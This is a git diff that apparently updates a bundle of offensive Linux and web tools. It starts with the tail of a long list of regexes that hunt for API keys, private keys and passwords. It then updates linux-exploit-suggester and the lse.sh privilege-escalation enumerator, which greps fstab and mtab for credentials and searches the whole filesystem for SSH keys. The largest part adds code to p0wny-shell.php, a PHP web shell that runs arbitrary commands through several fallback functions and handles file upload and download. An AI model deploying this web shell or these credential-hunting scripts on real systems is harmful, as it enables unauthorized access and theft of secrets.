"(access-(?:sandbox|development|production)-[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})" + search_for_regex "Prefect API token" "(pnu_[a-z0-9]{36})" + search_for_regex "Postman API Key" "PMAK-[a-fA-F0-9]{24}-[a-fA-F0-9]{34}" + search_for_regex "Private Keys" "\-\-\-\-\-BEGIN PRIVATE KEY\-\-\-\-\-|\-\-\-\-\-BEGIN RSA PRIVATE KEY\-\-\-\-\-|\-\-\-\-\-BEGIN OPENSSH PRIVATE KEY\-\-\-\-\-|\-\-\-\-\-BEGIN PGP PRIVATE KEY BLOCK\-\-\-\-\-|\-\-\-\-\-BEGIN DSA PRIVATE KEY\-\-\-\-\-|\-\-\-\-\-BEGIN EC PRIVATE KEY\-\-\-\-\-" + search_for_regex "Pulumi API Key" "pul-[a-f0-9]{40}" + search_for_regex "PyPI upload token" "pypi-AgEIcHlwaS5vcmc[A-Za-z0-9_\-]{50,}" + search_for_regex "Quip API Key" "(quip[a-z0-9_ \.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([a-zA-Z0-9]{15}=\|[0-9]{10}\|[a-zA-Z0-9\/+]{43}=)['\"]" 1 + search_for_regex "Rubygem API Key" "rubygems_[a-f0-9]{48}" + search_for_regex "Readme API token" "rdme_[a-z0-9]{70}" + search_for_regex "Sendbird Access ID" "([0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})" + search_for_regex "Sendgrid API Key" "SG\.[a-zA-Z0-9_\.\-]{66}" + search_for_regex "Sendinblue API Key" "xkeysib-[a-f0-9]{64}-[a-zA-Z0-9]{16}" + search_for_regex "Shippo API Key, Access Token, Custom Access Token, Private App Access Token & Shared Secret" "shippo_(live|test)_[a-f0-9]{40}|shpat_[a-fA-F0-9]{32}|shpca_[a-fA-F0-9]{32}|shppa_[a-fA-F0-9]{32}|shpss_[a-fA-F0-9]{32}" + search_for_regex "Sidekiq Secret" "([a-f0-9]{8}:[a-f0-9]{8})" + search_for_regex "Sidekiq Sensitive URL" "([a-f0-9]{8}:[a-f0-9]{8})@(?:gems.contribsys.com|enterprise.contribsys.com)" + search_for_regex "Slack Token" "xox[baprs]-([0-9a-zA-Z]{10,48})?" + search_for_regex "Slack Webhook" "https://hooks.slack.com/services/T[a-zA-Z0-9_]{10}/B[a-zA-Z0-9_]{10}/[a-zA-Z0-9_]{24}" + search_for_regex "Smarksheel API Key" "(smartsheet[a-z0-9_ \.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([a-z0-9]{26})['\"]" 1 + search_for_regex "Square Access Token" "sqOatp-[0-9A-Za-z_\-]{22}" + search_for_regex "Square API Key" "EAAAE[a-zA-Z0-9_-]{59}" + search_for_regex "Square Oauth Secret" "sq0csp-[ 0-9A-Za-z_\-]{43}" + search_for_regex "Stytch API Key" "secret-.*-[a-zA-Z0-9_=\-]{36}" + search_for_regex "Stripe Access Token & API Key" "(sk|pk)_(test|live)_[0-9a-z]{10,32}|k_live_[0-9a-zA-Z]{24}" 1 + search_for_regex "Telegram Bot API Token" "[0-9]+:AA[0-9A-Za-z\\-_]{33}" + search_for_regex "Trello API Key" "(trello[a-z0-9_ \.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([0-9a-z]{32})['\"]" + search_for_regex "Twilio API Key" "SK[0-9a-fA-F]{32}" + search_for_regex "Twitch API Key" "(twitch[a-z0-9_ \.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([a-z0-9]{30})['\"]" + search_for_regex "Twitter Client ID" "[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{18,25}" + search_for_regex "Twitter Bearer Token" "(A{22}[a-zA-Z0-9%]{80,100})" + search_for_regex "Twitter Oauth" "[tT][wW][iI][tT][tT][eE][rR].{0,30}['\"\\s][0-9a-zA-Z]{35,44}['\"\\s]" + search_for_regex "Twitter Secret Key" "[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{35,44}" + search_for_regex "Typeform API Key" "tfp_[a-z0-9_\.=\-]{59}" + search_for_regex "URLScan API Key" "['\"][a-f0-9]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{12}['\"]" + search_for_regex "Yandex Access Token" "(t1\.[A-Z0-9a-z_-]+[=]{0,2}\.[A-Z0-9a-z_-]{86}[=]{0,2})" + search_for_regex "Yandex API Key" "(AQVN[A-Za-z0-9_\-]{35,38})" + search_for_regex "Yandex AWS Access Token" "(YC[a-zA-Z0-9_\-]{38})" + search_for_regex "Web3 API Key" "(web3[a-z0-9_ \.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([A-Za-z0-9_=\-]+\.[A-Za-z0-9_=\-]+\.?[A-Za-z0-9_.+/=\-]*)['\"]" 1 + echo '' + + print_2title "Searching Misc" + search_for_regex "Generic Secret" "[sS][eE][cC][rR][eE][tT].*['\"][0-9a-zA-Z]{32,45}['\"]" + search_for_regex "Basic Auth" "//(.+):(.+)@" + search_for_regex "Code asigning passwords" "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass|pass').*[=:].+" + search_for_regex "PHP defined password" "define ?\(['\"](\w*pass|\w*pwd|\w*user|\w*datab)" + search_for_regex "Config Secrets" "passwd.*|creden.*|^kind:[^a-zA-Z0-9_]?Secret|[^a-zA-Z0-9_]env:|secret:|secretName:|^kind:[^a-zA-Z0-9_]?EncryptionConfiguration|\-\-encryption\-provider\-config" + search_for_regex "Simple Passwords" "passw.*[=:].+" + search_for_regex "Generiac API tokens search (A-C)" "(access_key|access_token|account_sid|admin_email|admin_pass|admin_user|adzerk_api_key|algolia_admin_key|algolia_api_key| algolia_search_key|alias_pass|alicloud_access_key|alicloud_secret_key|amazon_bucket_name|amazon_secret_access_key| amazonaws|anaconda_token|android_docs_deploy_token|ansible_vault_password|aos_key|aos_sec| api_key|api_key_secret|api_key_sid|api_secret|apiary_api_key|apigw_access_token|api.googlemaps|AIza|apidocs| apikey|apiSecret|app_bucket_perm|appclientsecret|app_debug|app_id|appkey|appkeysecret|app_key|app_log_level|app_report_token_key| app_secret|app_token|apple_id_password|application_key|appsecret|appspot|argos_token|artifactory_key|artifacts_aws_access_key_id| artifacts_aws_secret_access_key|artifacts_bucket|artifacts_key|artifacts_secret|assistant_iam_apikey|auth0_api_clientsecret| auth0_client_secret|auth_token|authorizationToken|author_email_addr|author_npm_api_key|authsecret|awsaccesskeyid|aws_access| aws_access_key|aws_access_key_id|aws_bucket|aws_config_accesskeyid|aws_key|aws_secret|aws_secret_access_key|awssecretkey| aws_secret_key|aws_secrets|aws_ses_access_key_id|aws_ses_secret_access_key|aws_token|awscn_access_key_id|awscn_secret_access_key| AWSSecretKey|b2_app_key|b2_bucket|bashrc password|bintray_api_key|bintray_apikey|bintray_gpg_password|bintray_key| bintray_token|bintraykey|bluemix_api_key|bluemix_auth|bluemix_pass|bluemix_pass_prod|bluemix_password|bluemix_pwd|bluemix_username brackets_repo_oauth_token|browser_stack_access_key|browserstack_access_key|bucket_password|bucketeer_aws_access_key_id| bucketeer_aws_secret_access_key|built_branch_deploy_key|bundlesize_github_token|bx_password|bx_username|cache_driver| cache_s3_secret_key|cargo_token|cattle_access_key|cattle_agent_instance_auth|cattle_secret_key|censys_secret|certificate_password| cf_password|cheverny_token|chrome_client_secret|chrome_refresh_token|ci_deploy_password|ci_project_url|ci_registry_user| ci_server_name|ci_user_token|claimr_database|claimr_db|claimr_superuser|claimr_token|cli_e2e_cma_token|client_secret| client_zpk_secret_key|clojars_password|cloud_api_key|cloud_watch_aws_access_key| cloudant_archived_database|cloudant_audited_database|cloudant_database|cloudant_instance|cloudant_order_database| cloudant_parsed_database|cloudant_password|cloudant_processed_database|cloudant_service_database| cloudflare_api_key|cloudflare_auth_email|cloudflare_auth_key|cloudflare_email|cloudinary_api_secret|cloudinary_name| cloudinary_url|cloudinary_url_staging|clu_repo_url|clu_ssh_private_key_base64|cn_access_key_id|cn_secret_access_key| cocoapods_trunk_email|cocoapods_trunk_token|codacy_project_token|codeclimate_repo_token|codecov_token|coding_token| conekta_apikey|conn.login|connectionstring|consumerkey|consumer_key|consumer_secret|contentful_access_token| contentful_cma_test_token|contentful_integration_management_token|contentful_integration_management_token| contentful_management_api_access_token|contentful_management_api_access_token_new|contentful_php_management_test_token| contentful_test_org_cma_token|contentful_v2_access_token|conversation_password|conversation_username|cos_secrets| coveralls_api_token|coveralls_repo_token|coveralls_token|coverity_scan_token|credentials| cypress_record_key)[a-z0-9_ .,<\-]{0,25}(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([0-9a-zA-Z_=\-]{8,64})['\"]" + search_for_regex "Generiac API tokens search (D-H)" "(danger_github_api_token|database_host|database_name|database_password|database_port|database_schema_test| database_user|database_username|datadog_api_key|datadog_app_key|db_connection|db_database|db_host|db_password| db_pw|db_server|db_user|db_username|dbpasswd|dbpassword|dbuser|ddg_test_email|ddg_test_email_pw|ddgc_github_token| deploy_password|deploy_secure|deploy_token|deploy_user|dgpg_passphrase|digitalocean_access_token| digitalocean_ssh_key_body|digitalocean_ssh_key_ids|docker_hub_password|docker_key|docker_pass|docker_passwd| docker_password|docker_postgres_url|docker_token|dockerhub_password|dockerhubpassword|doordash_auth_token| dot-files|dotfiles|dropbox_oauth_bearer|droplet_travis_password|dsonar_login|dsonar_projectkey|dynamoaccesskeyid| dynamosecretaccesskey|elastic_cloud_auth|elastica_host|elastica_port|elasticsearch_password|encryption_key| encryption_password|end_user_password|env_github_oauth_token|env_heroku_api_key|env_key|env_secret|env_secret_access_key| env_sonatype_password|eureka_awssecretkey|env.heroku_api_key|env.sonatype_password|eureka.awssecretkey|exp_password| file_password|firebase_api_json|firebase_api_token|firebase_key|firebase_project_develop|firebase_token|firefox_secret| flask_secret_key|flickr_api_key|flickr_api_secret|fossa_api_key|ftp_host|ftp_login|ftp_password|ftp_pw|ftp_user|ftp_username| gcloud_bucket|gcloud_project|gcloud_service_key|gcr_password|gcs_bucket|gh_api_key|gh_email|gh_next_oauth_client_secret| gh_next_unstable_oauth_client_id|gh_next_unstable_oauth_client_secret|gh_oauth_client_secret|gh_oauth_token|gh_repo_token| gh_token|gh_unstable_oauth_client_secret|ghb_token|ghost_api_key|git_author_email|git_author_name|git_committer_email| git_committer_name|git_email|git_name|git_token|github_access_token|github_api_key|github_api_token|github_auth|github_auth_token| github_auth_token|github_client_secret|github_deploy_hb_doc_pass|github_deployment_token|github_hunter_token|github_hunter_username| github_key|github_oauth|github_oauth_token|github_oauth_token|github_password|github_pwd|github_release_token|github_repo| github_token|github_tokens|gitlab_user_email|gogs_password|google_account_type|google_client_email|google_client_id|google_client_secret| google_maps_api_key|google_private_key|gpg_key_name|gpg_keyname|gpg_ownertrust|gpg_passphrase|gpg_private_key|gpg_secret_keys| gradle_publish_key|gradle_publish_secret|gradle_signing_key_id|gradle_signing_password|gren_github_token|grgit_user|hab_auth_token| hab_key|hb_codesign_gpg_pass|hb_codesign_key_pass|heroku_api_key|heroku_email|heroku_token|hockeyapp_token|homebrew_github_api_token| hub_dxia2_password)[a-z0-9_ .,<\-]{0,25}(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([0-9a-zA-Z_=\-]{8,64})['\"]" + search_for_regex "Generiac API tokens search (I-R)" "(ij_repo_password|ij_repo_username|index_name|integration_test_api_key|integration_test_appid|internal_secrets| ios_docs_deploy_token|itest_gh_token|jdbc_databaseurl|jdbc_host|jdbc:mysql|jwt_secret|kafka_admin_url|kafka_instance_name|kafka_rest_url| keystore_pass|kovan_private_key|kubecfg_s3_path|kubeconfig|kxoltsn3vogdop92m|leanplum_key|lektor_deploy_password|lektor_deploy_username| lighthouse_api_key|linkedin_client_secretorlottie_s3_api_key|linux_signing_key|ll_publish_url|ll_shared_key|looker_test_runner_client_secret| lottie_happo_api_key|lottie_happo_secret_key|lottie_s3_secret_key|lottie_upload_cert_key_password|lottie_upload_cert_key_store_password| mail_password|mailchimp_api_key|mailchimp_key|mailer_password|mailgun_api_key|mailgun_apikey|mailgun_password|mailgun_priv_key| mailgun_pub_apikey|mailgun_pub_key|mailgun_secret_api_key|manage_key|manage_secret|management_token|managementapiaccesstoken|mandrill_api_key| manifest_app_token|manifest_app_url|mapbox_access_token|mapbox_api_token|mapbox_aws_access_key_id|mapbox_aws_secret_access_key| mapboxaccesstoken|mg_api_key|mg_public_api_key|mh_apikey|mh_password|mile_zero_key|minio_access_key|minio_secret_key|multi_bob_sid| multi_connect_sid|multi_disconnect_sid|multi_workflow_sid|multi_workspace_sid|my_secret_env|mysql_database|mysql_hostname|mysql_password| mysql_root_password|mysql_user|mysql_username|mysqlmasteruser|mysqlsecret|nativeevents|netlify_api_key|new_relic_beta_token|nexus_password| nexuspassword|ngrok_auth_token|ngrok_token|node_env|node_pre_gyp_accesskeyid|node_pre_gyp_github_token|node_pre_gyp_secretaccesskey| non_token|now_token|npm_api_key|npm_api_token|npm_auth_token|npm_email|npm_password|npm_secret_key|npm_token|nuget_api_key|nuget_apikey| nuget_key|numbers_service_pass|oauth_token|object_storage_password|object_storage_region_name|object_store_bucket|object_store_creds| oc_pass|octest_app_password|octest_app_username|octest_password|ofta_key|ofta_region|ofta_secret|okta_client_token|okta_oauth2_client_secret| okta_oauth2_clientsecret|onesignal_api_key|onesignal_user_auth_key|open_whisk_key|openwhisk_key|org_gradle_project_sonatype_nexus_password| org_project_gradle_sonatype_nexus_password|os_auth_url|os_password|ossrh_jira_password|ossrh_pass|ossrh_password|ossrh_secret| ossrh_username|packagecloud_token|pagerduty_apikey|parse_js_key|passwordtravis|paypal_client_secret|percy_project|percy_token|personal_key| personal_secret|pg_database|pg_host|places_api_key|places_apikey|plotly_apikey|plugin_password|postgresql_db|postgresql_pass| postgres_env_postgres_db|postgres_env_postgres_password|preferred_username|pring_mail_username|private_signing_password|prod_access_key_id| prod_password|prod_secret_key|project_config|publish_access|publish_key|publish_secret|pushover_token|pypi_passowrd|qiita_token| quip_token|rabbitmq_password|randrmusicapiaccesstoken|redis_stunnel_urls|rediscloud_url|refresh_token|registry_pass|registry_secure| release_gh_token|release_token|reporting_webdav_pwd|reporting_webdav_url|repotoken|rest_api_key|rinkeby_private_key|ropsten_private_key| route53_access_key_id|rtd_key_pass|rtd_store_pass|rubygems_auth_token)[a-z0-9_ .,<\-]{0,25}(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([0-9a-zA-Z_=\-]{8,64})['\"]" + search_for_regex "Generiac API tokens search (S-Z)" "(s3_access_key|s3_access_key_id|s3_bucket_name_app_logs|s3_bucket_name_assets|s3_external_3_amazonaws_com|s3_key| s3_key_app_logs|s3_key_assets|s3_secret_app_logs|s3_secret_assets|s3_secret_key|s3_user_secret|sacloud_access_token| sacloud_access_token_secret|sacloud_api|salesforce_bulk_test_password|salesforce_bulk_test_security_token| sandbox_access_token|sandbox_aws_access_key_id|sandbox_aws_secret_access_key|sauce_access_key|scrutinizer_token|sdr_token|secret_0| secret_1|secret_10|secret_11|secret_2|secret_3|secret_4|secret_5|secret_6|secret_7|secret_8|secret_9|secret_key_base|secretaccesskey| secret_key_base|segment_api_key|selion_log_level_dev|selion_selenium_host|sendgrid|sendgrid_api_key|sendgrid_key|sendgrid_password|sendgrid_user| sendgrid_username|sendwithus_key|sentry_auth_token|sentry_default_org|sentry_endpoint|sentry_secret|sentry_key|service_account_secret|ses_access_key| ses_secret_key|setdstaccesskey|setdstsecretkey|setsecretkey|signing_key|signing_key_password|signing_key_secret|signing_key_sid|slash_developer_space| slash_developer_space_key|slate_user_email|snoowrap_client_secret|snoowrap_password|snoowrap_refresh_token|snyk_api_token|snyk_token| socrata_app_token|socrata_password|sonar_organization_key|sonar_project_key|sonar_token|sonatype_gpg_key_name|sonatype_gpg_passphrase| sonatype_nexus_password|sonatype_pass|sonatype_password|sonatype_token_password|sonatype_token_user|sonatypepassword|soundcloud_client_secret| soundcloud_password|spaces_access_key_id|spaces_secret_access_key|spotify_api_access_token|spotify_api_client_secret|spring_mail_password|sqsaccesskey| sqssecretkey|square_reader_sdk_repository_password|srcclr_api_token|sshpass|ssmtp_config|staging_base_url_runscope|star_test_aws_access_key_id| star_test_bucket|star_test_location|star_test_secret_access_key|starship_account_sid|starship_auth_token|stormpath_api_key_id|stormpath_api_key_secret| strip_publishable_key|strip_secret_key|stripe_private|stripe_public|surge_login|surge_token|svn_pass|tesco_api_key|test_github_token| test_test|tester_keys_password|thera_oss_access_key|token_core_java|travis_access_token|travis_api_token|travis_branch|travis_com_token|travis_e2e_token| travis_gh_token|travis_pull_request|travis_secure_env_vars|travis_token|trex_client_token|trex_okta_client_token|twilio_api_key|twilio_api_secret| twilio_chat_account_api_service|twilio_configuration_sid|twilio_sid|twilio_token|twine_password|twitter_consumer_key|twitter_consumer_secret|twitteroauthaccesssecret| twitteroauthaccesstoken|unity_password|unity_serial|urban_key|urban_master_secret|urban_secret|us_east_1_elb_amazonaws_com|use_ssh| user_assets_access_key_id|user_assets_secret_access_key|usertravis|v_sfdc_client_secret|v_sfdc_password|vip_github_build_repo_deploy_key|vip_github_deploy_key| vip_github_deploy_key_pass|virustotal_apikey|visual_recognition_api_key|vscetoken|wakatime_api_key|watson_conversation_password|watson_device_password| watson_password|widget_basic_password|widget_basic_password_2|widget_basic_password_3|widget_basic_password_4|widget_basic_password_5|widget_fb_password| widget_fb_password_2|widget_fb_password_3|widget_test_server|wincert_password|wordpress_db_password|wordpress_db_user|wpjm_phpunit_google_geocode_api_key| wporg_password|wpt_db_password|wpt_db_user|wpt_prepare_dir|wpt_report_api_key|wpt_ssh_connect|wpt_ssh_private_key_base64|www_googleapis_com| yangshun_gh_password|yangshun_gh_token|yt_account_client_secret|yt_account_refresh_token|yt_api_key|yt_client_secret|yt_partner_client_secret| yt_partner_refresh_token|yt_server_api_key|zensonatypepassword|zhuliang_gh_token|zopim_account_key)[a-z0-9_ .,<\-]{0,25}(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([0-9a-zA-Z_=\-]{8,64})['\"]" + search_for_regex "Usernames" "username.*[=:].+" + search_for_regex "Net user add" "net user .+ /add" + echo '' + else echo "Regexes to search for API keys aren't activated, use param '-r' " diff --git a/linux-exploit-suggester.sh b/linux-exploit-suggester.sh index 42b7768..da66838 100755 --- a/linux-exploit-suggester.sh +++ b/linux-exploit-suggester.sh @@ -1,7 +1,7 @@ #!/bin/bash # -# Copyright (c) 2016-2022, @_mzet_ +# Copyright (c) 2016-2023, https://github.com/mzet- # # linux-exploit-suggester.sh comes with ABSOLUTELY NO WARRANTY. # This is free software, and you are welcome to redistribute it diff --git a/lse.sh b/lse.sh index b29e6f2..2a7b801 100755 --- a/lse.sh +++ b/lse.sh @@ -5,7 +5,7 @@ # Author: Diego Blanco # GitHub: https://github.com/diego-treitos/linux-smart-enumeration # -lse_version="4.10nw" +lse_version="4.13nw" ##( Colors # @@ -611,6 +611,7 @@ lse_get_distro_codename() { #( elif [ -f /etc/os-release ]; then distro=`grep -E '^ID=' /etc/os-release | cut -f2 -d=` echo "$distro" | grep -qi opensuse && distro=opsuse + echo "$distro" | grep -qi rhel && distro=redhat elif [ -f /etc/redhat-release ]; then grep -qi "centos" /etc/redhat-release && distro=centos grep -qi "fedora" /etc/redhat-release && distro=fedora @@ -635,7 +636,7 @@ lse_get_pkg_version() { #( pkg_name="$1" case "$lse_distro_codename" in debian|ubuntu) - pkg_version=`dpkg -l "$pkg_name" 2>/dev/null | grep -E '^ii' | tr -s ' ' | cut -d' ' -f3` + pkg_version=`dpkg -l "$pkg_name" 2>/dev/null | grep -E '^[ih]i' | tr -s ' ' | cut -d' ' -f3` ;; centos|redhat|fedora|opsuse|rocky|amzn) pkg_version=`rpm -q "$pkg_name" 2>/dev/null` @@ -845,7 +846,7 @@ lse_run_tests_filesystem() { #looking for credentials in /etc/fstab and /etc/mtab lse_test "fst120" "0" \ "Are there any credentials in fstab/mtab?" \ - 'grep $lse_grep_opts -Ei "(user|username|login|pass|password|pw|credentials)[=:]" /etc/fstab /etc/mtab' + 'grep $lse_grep_opts -Ei "(user|username|login|pass|password|pw|credentials|cred)[=:]" /etc/fstab /etc/mtab' #check if current user has mail lse_test "fst130" "1" \ @@ -910,7 +911,7 @@ lse_run_tests_filesystem() { #check for SSH files anywhere lse_test "fst510" "2" \ "SSH files anywhere" \ - 'find / $lse_find_opts \( -name "*id_dsa*" -o -name "*id_rsa*" -o -name "known_hosts" -o -name "authorized_hosts" -o -name "authorized_keys" \) -exec ls -la {} \;' + 'find / $lse_find_opts \( -name "*id_dsa*" -o -name "*id_rsa*" -o -name "*id_ecdsa*" -o -name "*id_ed25519*" -o -name "known_hosts" -o -name "authorized_hosts" -o -name "authorized_keys" \) -exec ls -la {} \;' #dump hosts.equiv file lse_test "fst520" "2" \ diff --git a/p0wny-shell.php b/p0wny-shell.php index 629f0c3..c17dfd3 100644 --- a/p0wny-shell.php +++ b/p0wny-shell.php @@ -1,5 +1,10 @@ 'p0wny', + 'hostname' => 'shell', +); + function expandPath($path) { if (preg_match("#^(~[a-zA-Z0-9_.-]*)(/.*)?$#", $path, $match)) { exec("echo $match[1]", $stdout); @@ -8,8 +13,52 @@ function expandPath($path) { return $path; } +function allFunctionExist($list = array()) { + foreach ($list as $entry) { + if (!function_exists($entry)) { + return false; + } + } + return true; +} + +function executeCommand($cmd) { + $output = ''; + if (function_exists('exec')) { + exec($cmd, $output); + $output = implode("\n", $output); + } else if (function_exists('shell_exec')) { + $output = shell_exec($cmd); + } else if (allFunctionExist(array('system', 'ob_start', 'ob_get_contents', 'ob_end_clean'))) { + ob_start(); + system($cmd); + $output = ob_get_contents(); + ob_end_clean(); + } else if (allFunctionExist(array('passthru', 'ob_start', 'ob_get_contents', 'ob_end_clean'))) { + ob_start(); + passthru($cmd); + $output = ob_get_contents(); + ob_end_clean(); + } else if (allFunctionExist(array('popen', 'feof', 'fread', 'pclose'))) { + $handle = popen($cmd, 'r'); + while (!feof($handle)) { + $output .= fread($handle, 4096); + } + pclose($handle); + } else if (allFunctionExist(array('proc_open', 'stream_get_contents', 'proc_close'))) { + $handle = proc_open($cmd, array(0 => array('pipe', 'r'), 1 => array('pipe', 'w')), $pipes); + $output = stream_get_contents($pipes[1]); + proc_close($handle); + } + return $output; +} + +function isRunningWindows() { + return stripos(PHP_OS, "WIN") === 0; +} + function featureShell($cmd, $cwd) { - $stdout = array(); + $stdout = ""; if (preg_match("/^\s*cd\s*(2>&1)?$/", $cmd)) { chdir(expandPath("~")); @@ -23,17 +72,17 @@ function featureShell($cmd, $cwd) { return featureDownload($match[1]); } else { chdir($cwd); - exec($cmd, $stdout); + $stdout = executeCommand($cmd); } return array( - "stdout" => $stdout, - "cwd" => getcwd() + "stdout" => base64_encode($stdout), + "cwd" => base64_encode(getcwd()) ); } function featurePwd() { - return array("cwd" => getcwd()); + return array("cwd" => base64_encode(getcwd())); } function featureHint($fileName, $cwd, $type) { @@ -45,6 +94,9 @@ function featureHint($fileName, $cwd, $type) { } $cmd = "/bin/bash -c \"$cmd\""; $files = explode("\n", shell_exec($cmd)); + foreach ($files as &$filename) { + $filename = base64_encode($filename); + } return array( 'files' => $files, ); @@ -54,12 +106,12 @@ function featureDownload($filePath) { $file = @file_get_contents($filePath); if ($file === FALSE) { return array( - 'stdout' => array('File not found / no read permission.'), - 'cwd' => getcwd() + 'stdout' => base64_encode('File not found / no read permission.'), + 'cwd' => base64_encode(getcwd()) ); } else { return array( - 'name' => basename($filePath), + 'name' => base64_encode(basename($filePath)), 'file' => base64_encode($file) ); } @@ -70,19 +122,40 @@ function featureUpload($path, $file, $cwd) { $f = @fopen($path, 'wb'); if ($f === FALSE) { return array( - 'stdout' => array('Invalid path / no write permission.'), - 'cwd' => getcwd() + 'stdout' => base64_encode('Invalid path / no write permission.'), + 'cwd' => base64_encode(getcwd()) ); } else { fwrite($f, base64_decode($file)); fclose($f); return array( - 'stdout' => array('Done.'), - 'cwd' => getcwd() + 'stdout' => base64_encode('Done.'), + 'cwd' => base64_encode(getcwd()) ); } } +function initShellConfig() { + global $SHELL_CONFIG; + + if (isRunningWindows()) { + $username = getenv('USERNAME'); + if ($username !== false) { + $SHELL_CONFIG['username'] = $username; + } + } else { + $pwuid = posix_getpwuid(posix_geteuid()); + if ($pwuid !== false) { + $SHELL_CONFIG['username'] = $pwuid['name']; + } + } + + $hostname = gethostname(); + if ($hostname !== false) { + $SHELL_CONFIG['hostname'] = $hostname; + } +} + if (isset($_GET["feature"])) { $response = NULL; @@ -108,6 +181,8 @@ if (isset($_GET["feature"])) { header("Content-Type: application/json"); echo json_encode($response); die(); +} else { + initShellConfig(); } ?> @@ -125,6 +200,9 @@ if (isset($_GET["feature"])) { background: #333; color: #eee; font-family: monospace; + width: 100vw; + height: 100vh; + overflow: hidden; } *::-webkit-scrollbar-track { @@ -145,17 +223,21 @@ if (isset($_GET["feature"])) { #shell { background: #222; - max-width: 800px; - margin: 50px auto 0 auto; box-shadow: 0 0 5px rgba(0, 0, 0, .3); font-size: 10pt; display: flex; flex-direction: column; align-items: stretch; + max-width: calc(100vw - 2 * var(--shell-margin)); + max-height: calc(100vh - 2 * var(--shell-margin)); + resize: both; + overflow: hidden; + width: 100%; + height: 100%; + margin: var(--shell-margin) auto; } #shell-content { - height: 500px; overflow: auto; padding: 5px; white-space: pre-wrap; @@ -168,20 +250,27 @@ if (isset($_GET["feature"])) { text-align: center; } - @media (max-width: 991px) { + :root { + --shell-margin: 25px; + } + + @media (min-width: 1200px) { + :root { + --shell-margin: 50px !important; + } + } + + @media (max-width: 991px), + (max-height: 600px) { #shell-logo { font-size: 6px; margin: -25px 0; } - - html, body, #shell { - height: 100%; - width: 100%; - max-width: none; + :root { + --shell-margin: 0 !important; } - #shell { - margin-top: 0; + resize: none; } } @@ -210,6 +299,7 @@ if (isset($_GET["feature"])) { display: flex; box-shadow: 0 -1px 0 rgba(0, 0, 0, .3); border-top: rgba(255, 255, 255, .05) solid 1px; + padding: 10px 0; } #shell-input > label { @@ -230,6 +320,7 @@ if (isset($_GET["feature"])) { font-size: 10pt; width: 100%; align-self: center; + box-sizing: border-box; } #shell-input div { @@ -243,6 +334,7 @@ if (isset($_GET["feature"])) {